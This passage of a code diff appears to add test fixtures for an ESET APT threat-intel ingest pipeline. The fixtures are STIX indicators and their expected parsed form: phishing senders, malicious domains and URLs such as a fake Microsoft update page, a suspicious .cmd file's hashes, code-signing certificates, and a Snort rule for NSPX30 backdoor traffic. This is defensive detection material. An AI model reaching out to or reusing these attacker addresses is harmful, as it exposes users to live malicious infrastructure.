"indicator--f89cd8e8-3dfa-4157-bb4d-33ee9d7e054c", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"email\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T17:58:54.000Z", "pattern": "[email-message:from_ref.value = 'katecohen1984@portugalmail.pt' AND email-message:subject = 'Hackers Leak Explicit Photos of More Than 100 Government workers']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T07:41:04.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": 
"indicator--d9a10671-eb84-4039-8211-277c14104b39", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T07:41:04.000Z", "pattern": "[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T07:58:05.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"email\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T07:58:05.000Z", "pattern": "[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-10-02T07:58:05Z"} +{"created": "2023-10-03T08:15:57.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T08:15:57.000Z", "pattern": "[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = '06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T10:46:00Z"} +{"created": 
"2023-10-02T13:48:17.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T13:48:17.000Z", "pattern": "[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2022-03-26T00:00:00Z", "valid_until": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T13:16:00.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T13:16:00.000Z", "pattern": "[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2022-03-26T00:00:00Z", "valid_until": "2023-09-29T00:00:00Z"} +{"created": "2023-10-02T15:42:54.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T15:42:54.000Z", "pattern": "[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": 
"2023-05-05T00:00:00Z", "valid_until": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T15:46:12.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T15:46:12.000Z", "pattern": "[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-05-05T00:00:00Z", "valid_until": "2023-09-28T00:00:00Z"} +{"created": "2023-10-02T12:10:47.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-02T12:10:47.000Z", "pattern": "[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = 
'2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-10-02T12:10:47Z"} diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..4e864010e8c --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log-expected.json 
@@ -0,0 +1,1366 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-14T18:52:26.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-03-14T18:52:26.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2024-03-14T18:52:26.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2024-03-14T18:52:26.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\\\\\, Ltd, CN=Hangil IT Co.\\\\\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"2.1\", \"type\": \"indicator\", \"valid_from\": \"2024-03-14T18:52:26Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "4ede38dcb043138971c429eaaa2d4696", + 
"sha1": "28f9a8e7601f5338bf6e194151a718608c0124a8", + "sha256": "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645" + } + }, + "last_seen": "2024-03-14T18:52:26.000Z", + "modified_at": "2024-03-14T18:52:26.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2024-11-09T23:59:59.000Z", + "not_before": "2021-11-10T00:00:00.000Z", + "serial_number": "0139dde119bb320dfb9f5defe3f71245", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "common_name": [ + "Hangil IT Co.\\\\, Ltd" + ], + "country": [ + "KR" + ], + "distinguished_name": "C=KR, ST=Seoul, O=Hangil IT Co.\\\\, Ltd, CN=Hangil IT Co.\\\\, Ltd", + "organization": [ + "Hangil IT Co.\\\\, Ltd" + ], + "state_or_province": [ + "Seoul" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2024-03-14T19:02:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2025-03-14T19:02:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2024-03-14T19:02:03.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2024-03-14T19:02:03.000Z\", \"pattern\": \"[domain-name:resolves_to_refs[*].value = '141.164.63.254']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"2.1\", 
\"type\": \"indicator\", \"valid_from\": \"2024-03-14T19:02:03Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2024-03-14T19:02:03.000Z", + "modified_at": "2024-03-14T19:02:03.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "141.164.63.254" + } + } + } + }, + { + "@timestamp": "2024-01-15T15:52:02.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-01-14T15:52:02.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2024-01-15T15:52:02.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"network\"}],\"labels\":[\"misp:name=\\\"x509\\\"\",\"misp:meta-category=\\\"network\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2024-01-15T15:52:02.000Z\",\"pattern\":\"[x509-certificate:hashes.MD5 = '71b91c0a53cfc3515e45c8c3b72f88c0' AND x509-certificate:hashes.SHA1 = '30db7d678045e44d882d7652ba6aaa6593c02328' AND x509-certificate:hashes.SHA256 = '37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '008890cab1cd510cd20dab4ce5948cbc3a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2025-04-03 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-03-02 
00:00:00+00:00']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2024-01-15T15:52:02Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "71b91c0a53cfc3515e45c8c3b72f88c0", + "sha1": "30db7d678045e44d882d7652ba6aaa6593c02328", + "sha256": "37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101" + } + }, + "last_seen": "2024-01-15T15:52:02.000Z", + "modified_at": "2024-01-15T15:52:02.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2025-04-03T23:59:59.000Z", + "not_before": "2023-03-02T00:00:00.000Z", + "serial_number": "008890cab1cd510cd20dab4ce5948cbc3a", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "country": [ + "KR" + ], + "distinguished_name": "C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD", + "organization": [ + "D2innovation Co." 
+ ], + "state_or_province": [ + "Gyeonggi-do" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2024-01-15T17:05:32.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2", + "meta_category": "network", + "name": "x509", + "valid_until": "2025-01-14T17:05:32.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2024-01-15T17:05:32.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"network\"}],\"labels\":[\"misp:name=\\\"x509\\\"\",\"misp:meta-category=\\\"network\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2024-01-15T17:05:32.000Z\",\"pattern\":\"[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2024-01-15T17:05:32Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + 
"confidence": "High", + "file": { + "hash": { + "md5": "ed8893f16d887956e6a8a433645655fc", + "sha1": "1ce0c3a55850c7e3f6b904b73e856e414b8293d1", + "sha256": "f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a" + } + }, + "last_seen": "2024-01-15T17:05:32.000Z", + "modified_at": "2024-01-15T17:05:32.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1", + "organization": [ + "DigiCert\\\\, Inc." + ] + }, + "not_after": "2022-11-29T23:59:59.000Z", + "not_before": "2021-11-29T00:00:00.000Z", + "serial_number": "0187a16b5e3a704b7fcab2598f50005a", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "country": [ + "CN" + ], + "distinguished_name": "??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=" + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-11-17T19:00:49.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-11-16T19:00:49.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-11-17T19:00:49.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--16425bff-e5ba-4096-8883-0b340e892c45\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-11-17T19:00:49.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = 
'9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-11-17T19:00:49Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "8ad6881721a82127b46fd5d07a1fab4b", + "sha1": "9ebf592dd04da5274f1db1da41ab1434dd4c6aa1", + "sha256": "d3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324" + } + }, + "last_seen": "2023-11-17T19:00:49.000Z", + "modified_at": "2023-11-17T19:00:49.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "SSL.com EV Code Signing Intermediate CA RSA R3" + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3", + "locality": [ + "Houston" + ], + "organization": [ + "SSL Corp" + ], + "state_or_province": [ + "Texas" + ] + }, + "not_after": "2024-09-19T11:51:47.000Z", + "not_before": "2022-09-20T11:51:47.000Z", + "serial_number": 
"47f49de6c7e29352e9f0775f68e15d8b", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "common_name": [ + "Level Software\\\\\\\\, Inc." + ], + "country": [ + "US" + ], + "distinguished_name": "C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US", + "locality": [ + "Asheville" + ], + "organization": [ + "Level Software\\\\\\\\, Inc." + ], + "organizational_unit": [ + "Information Security" + ], + "state_or_province": [ + "North Carolina" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-11-01T04:41:36.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "category": "Network activity", + "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", + "type": "snort", + "valid_until": "2024-10-31T04:41:36.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-11-01T04:41:36.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"Network activity\"}], \"labels\": [\"misp:type=\\\"snort\\\"\", \"misp:category=\\\"Network activity\\\"\"], \"modified\": \"2023-11-01T04:41:36.000Z\", \"pattern\": \"[alert tcp any any -> any 80 \\\\\\r\\n (msg:\\\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\\\"; gid:45534554; sid:45030002; rev:1;\\\\\\r\\n metadata: author \\\"ESET Research\\\", date \\\"2023-10-31\\\", hash \\\"82295E138E89F37DD0E51B1723775CBE33D26475\\\",\\\\\\r\\n copyright \\\"ESET Research\\\", distribution \\\"Distribution is forbidden. 
Do not upload to any multi-scanner or share on any threat intel platform.\\\";\\\\\\r\\n content: \\\"GET /id=\\\"; content: \\\"User-Agent: Mozilla/4.0 (compatible\\\\;MSIE 5.0\\\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\\\";)]\", \"pattern_type\": \"snort\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-11-01T04:41:36Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-11-01T04:41:36.000Z", + "modified_at": "2023-11-01T04:41:36.000Z", + "provider": "eset" + } + } + }, + { + "@timestamp": "2023-09-29T09:12:42.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-09-28T09:12:42.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:12:42.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:12:42.000Z\", \"pattern\": \"[domain-name:value = 'acertab.info']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-14T11:39:37Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-09-29T09:12:42.000Z", + "modified_at": "2023-09-29T09:12:42.000Z", + "provider": "eset", + "type": 
"domain-name", + "url": { + "original": "acertab.info" + } + } + } + }, + { + "@timestamp": "2023-09-29T08:48:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-09-28T08:48:51.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:51.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:51.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T08:48:51Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": 
"ef36b08d59b9a6b2f538c1d24967fa23", + "sha1": "0cd26ef0b232e6ed9910733e1d175a80a083aa08", + "sha256": "e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8" + } + }, + "last_seen": "2023-09-29T08:48:51.000Z", + "modified_at": "2023-09-29T08:48:51.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + "issuer": { + "common_name": [ + "Sectigo Public Code Signing CA R36" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36", + "organization": [ + "Sectigo Limited" + ] + }, + "not_after": "2024-05-09T23:59:59.000Z", + "not_before": "2023-05-10T00:00:00.000Z", + "serial_number": "3bd92ce9987095f74623d7c37e8d344e", + "signature_algorithm": "1.2.840.113549.1.1.12", + "subject": { + "common_name": [ + "GREATIV LIMITED" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED", + "organization": [ + "GREATIV LIMITED" + ], + "state_or_province": [ + "London" + ] + }, + "version_number": "3" + } + } + } + }, + { + "@timestamp": "2023-09-29T09:00:06.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T09:00:06.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:00:06.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", 